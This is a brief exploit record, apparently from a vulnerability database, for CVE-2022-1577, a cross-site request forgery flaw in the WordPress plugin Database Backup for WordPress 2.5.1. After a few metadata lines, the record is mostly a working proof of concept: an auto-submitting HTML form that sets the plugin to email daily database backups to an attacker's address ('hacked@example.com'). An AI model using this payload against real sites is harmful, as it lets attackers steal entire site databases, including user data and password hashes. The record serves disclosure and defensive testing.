CVE: CVE-2022-1577

Name: Database Backup for WordPress (wp-db-backup)

Version: 2.5.1

Date: 2022-04-10 10:01:26

Advisory: https://wpscan.com/vulnerability/39388900-266d-4308-88e7-d40ca6bbe346

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/tools.php?page=wp-db-backup#schedule" method="POST">
    <input type="text" name="wp_cron_schedule" value="daily">
    <input type="text" name="cron_backup_recipient" value="hacked@example.com">
    <input type="text" name="wp_cron_backup_options" value="SET">
</form>
<script>
    document.forms[0].submit();
</script>